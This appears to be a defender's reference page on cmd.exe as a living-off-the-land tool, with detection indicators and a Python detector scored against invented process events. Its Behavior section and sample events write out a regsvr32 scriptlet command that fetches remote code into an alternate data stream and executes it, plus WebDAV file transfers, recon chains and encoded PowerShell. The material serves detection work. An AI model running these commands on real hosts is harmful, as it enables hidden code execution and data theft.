Process
cmd.exe
cmd.exe is the Windows Command Processor, the classic command-line interpreter for Windows. It runs typed commands and batch scripts (.bat and .cmd files), provides built-in commands like dir, copy, and set, and chains programs together with operators. It predates PowerShell and is still the default shell behind countless scripts, installers, and automation tasks.
File identity
Not observed.
Execution context
Not observed.
Ancestry
Not observed.
Behavior
Not observed.
The first two entries work as a pair: the echo writes a regsvr32 one-liner into an alternate data stream of an existing file, and the second command feeds that stream back to cmd.exe on standard input so nothing new appears in a directory listing.
- cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:{REMOTEURL:.sct} ^scrobj.dll > {PATH}:payload.bat · ADS · Can be used to evade defensive countermeasures or to hide as a persistence mechanism
- cmd.exe - < {PATH}:payload.bat · ADS · Can be used to evade defensive countermeasures or to hide as a persistence mechanism
- type {PATH_SMB} > {PATH_ABSOLUTE} · Download · Download/copy a file from a WebDAV server
- type {PATH_ABSOLUTE} > {PATH_SMB} · Upload · Upload a file to a WebDAV server
Indicators
Not observed.
Analysis
cmd.exe is the command shell that has shipped with Windows NT from the start. The genuine binary lives at C:\Windows\System32\cmd.exe, with a 32-bit copy under SysWOW64. It interprets built-in commands (dir, set, copy, del, and the like) directly, runs external programs by name, and executes batch files written in its own simple scripting syntax.
It can run interactively or take a command non-interactively with /c (run the command, then exit) or /k (run it, then stay open). Commands can be combined with the &, &&, and || operators and piped with |. Like any console program it is hosted by conhost.exe.
Its parent is whatever launched it: an interactive explorer.exe session, a batch file, the Task Scheduler, a software installer, or another program shelling out to run a command. As with PowerShell, a broad set of parents is normal, so the process is hard to baseline on its own.
cmd.exe is one of the most common living-off-the-land tools on Windows (T1059.003). The signed binary runs reconnaissance, chains utilities together, and launches other LOLBINs, so path and signature checks pass and what gives it away is the command line and the parent. A cmd.exe spawned by an Office application or an internet-facing service process is a strong sign of macro-borne or exploited-service execution.
Attackers obfuscate command lines to slip past detection (T1027.010), using caret escapes, doubled quotes, and environment-variable substitution so that a string like c^m^d or %COMSPEC% reaches the interpreter intact while reading as noise to a scanner.
Hands-on-keyboard activity often surfaces here first. A /c chain of discovery commands (whoami /all, net group, ipconfig /all, systeminfo) run in quick succession is a recognizable pattern of an operator getting their bearings on a freshly accessed host.
- Image path other than C:\Windows\System32\cmd.exe or its SysWOW64 copy (high)
- Parent is an Office application, wscript.exe, cscript.exe, or mshta.exe (high)
- Spawned by a server or service process such as w3wp.exe or sqlservr.exe (high)
- A /c line invoking download or proxy LOLBINs (certutil.exe, bitsadmin.exe, powershell.exe -enc) (high)
- A /c line running a recon chain (whoami, net, ipconfig, systeminfo, nltest) (med)
- Command line obfuscated with caret (^) escapes, stray quotes, or environment-variable substitution (med)
- Output redirected to an alternate data stream or an unusual temp path (med)
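The indicator list above, the obfuscation point made in the analysis, and the ADS redirection shown under Behavior can all be exercised in one place. The following Python is an added example, not code from this page or its source project: it first normalizes a cmd.exe command line the way the interpreter itself would read it (caret escapes removed outside quoted regions, quote characters dropped, %COMSPEC% expanded), then applies the indicators to a handful of constructed Sysmon-style process-creation events. The regex sets for Office processes, service parents, download LOLBINs and recon commands are assumptions drawn from the list above, and the sample events are invented, not real telemetry.

```python
import re

# Constructed sample events in the shape of Sysmon Event ID 1 / Security 4688
# fields (parent image, image, command line). They are invented for this
# example and are not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c dir "C:\Users\alice\Documents"'},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"c^m^d /c powershell.exe -enc SQBFAFgA"},
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c whoami /all & net group "domain admins" /domain & ipconfig /all & systeminfo'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:http://x/a.sct ^scrobj.dll > C:\Users\Public\notes.txt:payload.bat"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\alice\AppData\Local\Temp\cmd.exe",
     "cmdline": r"cmd.exe /k"},
]

# Assumed process-name sets, taken from the indicator list on this page.
LEGIT_IMAGE = re.compile(r"^C:\\Windows\\(System32|SysWOW64)\\cmd\.exe$", re.I)
OFFICE_PARENT = re.compile(r"\\(winword|excel|powerpnt|outlook|msaccess|wscript|cscript|mshta)\.exe$", re.I)
SERVICE_PARENT = re.compile(r"\\(w3wp|sqlservr)\.exe$", re.I)
RUN_FLAG = re.compile(r"\s/[ck]\b", re.I)
DOWNLOAD_LOLBIN = re.compile(r"\b(certutil|bitsadmin)(\.exe)?\b|\bpowershell(\.exe)?\b.*\s-e(c|nc|ncodedcommand)?\b", re.I)
RECON_CMD = re.compile(r"\b(whoami|net\s+(?:user|group|localgroup|view)|ipconfig|systeminfo|nltest)\b", re.I)
ADS_REDIRECT = re.compile(r">\s*\S*[\\.]\S*:[^\\/:\s]+")   # "> file.ext:stream"
TEMP_REDIRECT = re.compile(r">\s*\S*\\Temp\\", re.I)
COMSPEC = re.compile(r"%COMSPEC%", re.I)
SEVERITY_RANK = {"high": 2, "med": 1}


def normalize(cmdline: str) -> str:
    """Rebuild the text cmd.exe acts on: a caret outside a quoted region
    escapes the next character and is dropped, quote characters themselves
    are dropped (so w""h""o""a""m""i becomes whoami), and %COMSPEC% is
    expanded to the real interpreter path."""
    out, in_quote, i = [], False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            in_quote = not in_quote          # only changes how carets are read
        elif ch == "^" and not in_quote and i + 1 < len(cmdline):
            i += 1                           # keep the escaped char, drop the caret
            out.append(cmdline[i])
        else:
            out.append(ch)
        i += 1
    return COMSPEC.sub(lambda m: r"C:\Windows\System32\cmd.exe", "".join(out))


def score(event: dict) -> list:
    """Apply the page's indicators to one event; returns (severity, reason) pairs."""
    raw, line, hits = event["cmdline"], normalize(event["cmdline"]), []
    if not LEGIT_IMAGE.match(event["image"]):
        hits.append(("high", "image path is not the System32/SysWOW64 cmd.exe"))
    if OFFICE_PARENT.search(event["parent"]):
        hits.append(("high", "parent is an Office application or script host"))
    if SERVICE_PARENT.search(event["parent"]):
        hits.append(("high", "spawned by a server or service process"))
    if RUN_FLAG.search(line):
        if DOWNLOAD_LOLBIN.search(line):
            hits.append(("high", "/c line invokes a download or proxy LOLBIN"))
        recon = {m.group(1).split()[0].lower() for m in RECON_CMD.finditer(line)}
        if len(recon) >= 2:                  # two or more distinct discovery commands
            hits.append(("med", "/c line runs a recon chain: " + ", ".join(sorted(recon))))
    if "^" in raw or COMSPEC.search(raw) or re.search(r'\w"\w', raw):
        hits.append(("med", "command line obfuscated with carets, stray quotes or %COMSPEC%"))
    if ADS_REDIRECT.search(line) or TEMP_REDIRECT.search(line):
        hits.append(("med", "output redirected to an alternate data stream or temp path"))
    return hits


def max_severity(hits: list) -> str:
    return max((s for s, _ in hits), key=SEVERITY_RANK.get, default="none")


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        hits = score(ev)
        print(max_severity(hits).upper().ljust(5), ev["cmdline"])
        for sev, why in hits:
            print("      ", sev, "-", why)
```

Matching is done on the normalized line while the obfuscation indicator is raised from the raw one, so a rule like the recon chain still fires when the operator writes `w^h^o^a^m^i`, and the obfuscation itself becomes a second, independent signal. Quote tracking matters: a caret inside a quoted string is literal to cmd.exe, so stripping carets blindly would alter legitimate arguments.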
Telemetry
Not observed.